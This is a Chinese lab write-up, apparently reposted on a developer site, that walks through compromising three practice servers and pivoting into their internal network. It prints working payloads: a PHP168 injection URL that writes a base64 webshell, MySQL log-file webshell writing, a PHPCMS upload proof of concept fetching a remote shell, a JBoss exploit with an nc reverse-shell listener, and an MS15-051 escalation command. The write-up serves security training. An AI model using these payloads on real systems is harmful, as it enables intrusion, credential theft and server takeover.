渗透测试到内网综合练习

栏目: 编程工具 · 发布时间: 6年前

内容简介:——————————目标IP:192.168.15.53

难度系数: ☆☆☆

——————————

目标IP:192.168.15.53 

192.168.15.54

192.168.15.57

已知信息:上述IP其中一台服务器连着内网

练习任务:拿下目标IP服务器并进行内网渗透

本次老师只发放了三个外网ip地址,而不是像上次一样直接把导图发给我们,这意味着本次内网ip需要手动去寻找。

接下来,让我们真正开始进行练习吧~

目标一:192.168.15.54

使用 工具 扫描端口:

端口分别为8081、999、3389 、3306,端口8081即网站web服务,端口999为phpmyadmin后台地址。

访问 8081 端口:

渗透测试到内网综合练习

图标告诉我们这是一个 php 168,既然放出来这个cms,这个cms 必然是有漏洞的。

我们可以 搜集该程序在网上已知的漏洞信息。

渗透测试到内网综合练习

漏洞链接:

https://www.secpulse.com/archives/21707.html

这篇文章的漏洞点在login.php文件中,但是目标网站并没有该文件,所以测试失败了。

我们试试其他的已知漏洞。

第二篇漏洞文章介绍:

https://www.secpulse.com/archives/6663.html

注册会员访问这个漏洞地址:

/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job= endHTML

渗透测试到内网综合练习

看到漏洞是存在的,我们把执行的代码换成生成一句话木马的代码:

http://192.168.15.54:8081/member/post.php?only=1&aid=1&job=endHTML&showHtml_Type[bencandy][1]={${fwrite(fopen(base64_decode(%27eC5waHAg%27),%27w%27),base64_decode(%27PD9AZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4g%27))%20and%20print(%27ok%27)}}

执行成功会在当前目录生成一个x.php 一句话文件。

渗透测试到内网综合练习

渗透测试到内网综合练习

访问x.php文件是存在的,我们 打开菜刀连接。

渗透测试到内网综合练习

查看是否执行cmd。

渗透测试到内网综合练习

竟然有

325个补丁, 意味着exp成功率很低了。只能调整思路,前面得到的信息phpmyadmin还没有拿到密码,现在可以从数据库配置文件中找到密码尝试登陆。

渗透测试到内网综合练习

渗透测试到内网综合练习

成功登录,

有了mysql ,那就尝试udf提权。

渗透测试到内网综合练习

成功执行。

然而事情并没有那么简单,在执行添加用户的时候 net 无法使用,只能查找利用无net添加账户的办法。

渗透测试到内网综合练习

渗透测试到内网综合练习

添加账户成功,查看 ip信息,发现没有其他ip信息。这台服务器没有通内网,那就进行下一个目标。

目标二:192.168.15.57

查看目标ip信息。

渗透测试到内网综合练习

开启了999、3306、8088等端口,其中 999 是phpmyadmin端口、3306 是 mysql 服务端口,8088端口上存在http服务,可以先从8088端口开始测试。

渗透测试到内网综合练习

发现是一个招聘网站,测试一些常见参数,结果存在异常。

渗透测试到内网综合练习

貌似存在一个注入,使用sqlmap进行测试。

渗透测试到内网综合练习

成功注入。

渗透测试到内网综合练习

注入出账户,却无法注入出密码。可暂且把root密码注入出来。

渗透测试到内网综合练习

成功注入root密码,尝试登录mysql服务或者phpmyadmin。

渗透测试到内网综合练习

这时候有了数据库就看能不能找到路径了。

渗透测试到内网综合练习

根据以往实验知道护卫神套件的phpmyadmin 是放在phpweb/web当前目录下的 ,那么就利用更改日志路径拿shell。(小提示:该目录默认是没有权限的,因靶场负责人疏忽而开启)

渗透测试到内网综合练习

渗透测试到内网综合练习

查看服务器信息:发现只打了三个补丁,可以使用常见的提权工具进行提权。

渗透测试到内网综合练习

查看ip信息发现没有敏感ip, 那么进入存在内网IP的只能是最后一台服务器了。

目标三:192.168.15.53

信息收集方式与前面相同,这里就不赘述了。直接 访问该目标:

渗透测试到内网综合练习

是一个通达oa系统,下面是相关漏洞链接:

https://www.secpulse.com/archives/24591.html

这个漏洞需要进入后台操作,但是我们没有账户,尝试搜索一下注入的漏洞,发现都是需要登陆。暴力破解和手动猜解密码都不可行。

结果无意中输入了admin,密码填都不用填就登陆成功了。

渗透测试到内网综合练习

还是很幸运的~

上方漏洞介绍表明是利用上传图片马进行文件包含,找到一处上传点。

渗透测试到内网综合练习

这里不是直接引用图片地址,而是调用参数获取,意味着真实路径找不到了。只能再仔细分析url:

http://192.168.15.53:8088/inc/attach_old.php?ATTACHMENT_ID=photo&ATTACHMENT_NAME=1.jpg&DIRECT_VIEW=1

通过路径看url,猜想会不会是 photo/attachment/1.jpg。

我们试试。

渗透测试到内网综合练习

显然不是,我们再换一下位置

attachment/photo/1.jpg

渗透测试到内网综合练习

访问出现403,证明这个文件存在。说明我们把路径猜对了(心里开心下)

那么我们可以直接进行文件包含。

渗透测试到内网综合练习

文件包含成功, 连接菜刀。

渗透测试到内网综合练习

显示未登录,直接在菜刀里登陆。

渗透测试到内网综合练习

菜刀连接还是出现报错。

渗透测试到内网综合练习 确认菜刀问题,更换另外的版本就可以了。

渗透测试到内网综合练习

成功连接。

渗透测试到内网综合练习

存在四个补丁,这里利用普通的提权工具便能提权成功了。

下面进行内网渗透的过程。

内网渗透

渗透测试到内网综合练习

发现有10段ip,使用 ew工具转发,通过对之前的端口收集情况,尝试扫描999、8088、8081、8008等端口。

渗透测试到内网综合练习

发现ip  10.12.1.2,10.12.1.3 ,10.12.15,访问10.12.1.2 。

渗透测试到内网综合练习

发现是个jboss,在网上找了许多exp利用工具,最后发现一款工具可以使用,

工具下载地址:

http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

本地nc监听: nc -lvvp 3666 

利用工具反弹shell。

渗透测试到内网综合练习

成功利用。

渗透测试到内网综合练习

找到一个root文件 ,里面的内容为: aHV3ZWlza ,暂且先记着。

渗透测试到内网综合练习

接下来访问10.12.1.3。

渗透测试到内网综合练习

是一个phpcms系统,刚好上个礼拜试验过:

PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)

poc如下:

siteid=1&modelid=11&username=test123456&password=test676676&email=test56566@qq.com&info[content]=<img src=http://10.12.1.2/1.txt?.php#.jpg>&dosubmit=1&protocol=

其中:http://10.12.1.2/1.txt

文件需要自己创建且目标机器能访问的资源,内容为一句话木马。

渗透测试到内网综合练习

shell地址:

http://10.12.1.3/uploadfile/2018/0628/20180628113055384.php

打开菜刀连接。

渗透测试到内网综合练习

虚拟终端查看权限发现是system ,可以添加用户直接登陆远程桌面。

渗透测试到内网综合练习

渗透测试到内网综合练习

登陆之后和目标机器2一样,找找线索...

找到一个文件里面存在奇怪的密码 :GVuLmNvbQ== 

渗透测试到内网综合练习

到这里整理一下收集到的线索:

10.12.12  ==> aHV3ZWlza

10.12.1.3 ==> GVuLmNvbQ== 

看着是不是很熟悉,base64加密,先组合解密一下。

渗透测试到内网综合练习

得到 huweishen.com  , 难道还是mysql的密码?

根据上次实验,这个应该就是10.12.1.5 的mysql密码

内网目标:10.12.1.5

打开 10.12.1.5 ,是一个静态页面,在开始内网扫描的时候发现开了几个端口。

渗透测试到内网综合练习

习惯性的目录扫描一下:

渗透测试到内网综合练习

结果发现10.12.1.5:999 和10.12.1.5/phpmyadmin 是同一个phpmyadmin登陆页面,

试了弱口令和爆破,都没有成功。(字典太弱了)

这个时候想起之前解密出来的一个密码:huweishen.com,尝试了一下果然登陆成功。

渗透测试到内网综合练习

拿到mysql权限,下一步肯定日志写webshell,udf提权。 在这之前先看看mysql 的安装路径。

渗透测试到内网综合练习

利用select @@basedir; 查询到路径为:

C:/Huweishen.com/PHPWEB/MySQL Server 5.5,

是护卫神的环境, 接下来就是拿 shell 了, 但是遇到了一个问题就是没有拿到网站的路径。在网上看了一下护卫神的网站目录(默认是d:\wwwroot\xxx),但是试着写入,以失败告终。

这个地方卡住了, 就在准备放弃的时候,想到一个办法!

就是现在能访问phpmyadmin ,为何不把shell文件放到phpmyadmin目录呢,行动起来。

该怎么找phpmyadmin的目录呢?

下载一个护卫神本地安装一下,可以看到 phpmyadmin 默认的路径是这个:

C:\Huweishen.com\PHPWEB\phpmyadmin\web 

渗透测试到内网综合练习

找到路径就可以写入了, 还是利用日志写入的方式,在写shell之前先写入一个测试文件。

渗透测试到内网综合练习

可以访问:

1、set global general_log='on'

2、set global general_log_file='C:\\Huweishen.com\\PHPWEB\\phpmyadmin\\web\\shell.php'

3、select "<?php eval($_POST[0])?>"

按照上面的步骤操作, 成功拿到shell(地址:http://10.12.1.5:999/shell.php)!

渗透测试到内网综合练习

拿到shell 发现 cmd 不能执行命令。

渗透测试到内网综合练习

根据经验,我们换个别的木马试一下, asp,aspx ......发现还支持aspx的,于是就使用了aspx的木马。

渗透测试到内网综合练习

cmd还是不能运行....

渗透测试到内网综合练习

在我翻看资源文件的时候发现里面有ftp ,这让我想到  serv-u....

渗透测试到内网综合练习

于是我就找了软件安装目录,果然有...

渗透测试到内网综合练习

找到配置文件,看到里面加密的密码....

渗透测试到内网综合练习

解出密码 123

渗透测试到内网综合练习

密码不对,无法连接,只能继续寻找, 一定有正确的配置文件...

渗透测试到内网综合练习 存在一个配置文件的副本,打开发现 password的加密值是不一样的,先解密看看。

渗透测试到内网综合练习

解密得到 gongxifacai  。

渗透测试到内网综合练习

渗透测试到内网综合练习

命令执行成功,,,但是没有回显,把命令执行的结果储存到一个文本中就可以了!

whoami 的结果是一个低权限的账户,但只要能执行cmd命令就好办!

渗透测试到内网综合练习

systeminfo查看系统信息发现补丁就打了两个,这下应该可以用exp了。

渗透测试到内网综合练习

利用提权辅助找到可以用的exp...来看看效果,, 

执行:

cmd.exe /c C:\Huweishen.com\PHPWEB\phpmyadmin\web\ms15-051x64.exe "whoami" > C:\Huweishen.com\PHPWEB\phpmyadmin\web\2.txt

渗透测试到内网综合练习

拿到system权限!剩下的就简单啦~

渗透测试到内网综合练习

到了这里此次渗透测试练习终于完成了。

总结

  1. 根据已知的程序或中间件名称来在网上寻找公开的利用漏洞信息。

  2. 在本机模拟目标机器的环境往往会获得一些有用的信息,了解目标才更容易成功的渗透进去。

渗透测试到内网综合练习

web安全 线下 火热招生中

培训详情:

https://mp.weixin.qq.com/s/1XvL0J0NSCQowsjmo_TPpw

官网地址:

www.zhiaq.com

客服QQ:1958165673

渗透测试到内网综合练习

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

社群运营五十讲

社群运营五十讲

陈菜根 / 北京时代华文书局 / 2018-4-1 / 49.80

物以类聚,人以群分,社群营销不只是简单的建群、卖东西,而是建立一种自动运转的,去中心化的生态圈,让相同爱好的人产生关系,迸发出裂变的火花,创造更多的营销机会。本书从基本的社群概念入手,讲解了社群的五大要素,社群活动的运作,社群的变现模式以及如何做一个社群师等内容,最后再从如何打造社群IP入手,详细讲解了社群IP的定义、分类及操作过程。一起来看看 《社群运营五十讲》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

在线进制转换器
在线进制转换器

各进制数互转换器

html转js在线工具
html转js在线工具

html转js在线工具